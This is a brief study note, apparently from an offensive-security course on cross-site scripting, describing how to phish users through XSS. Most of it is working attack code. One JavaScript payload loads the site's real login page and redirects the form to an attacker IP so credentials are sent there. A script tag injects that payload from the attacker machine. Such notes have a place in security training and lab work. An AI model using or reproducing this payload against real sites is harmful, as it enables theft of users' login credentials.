Phishing Users

How use external payload see here: 2023042721181010 XSS external JS payload Show user an origin login page, but action change on an attacker machine .

Payload

fetch("login").then(res => res.text().then(data => {
    document.getElementsByTagName("html")[0].innerHTML = data;
    document.getElementsByTagName("form")[0].action = "http://192.168.49.55";
    document.getElementsByTagName("form")[0].method = "get";
}))

Inject payload

<script src='http://192.168.49.55/xss.js'></script>

Example:

References

1. web200.Cross-Site Scripting Exploitation and Case Study.Phishing Users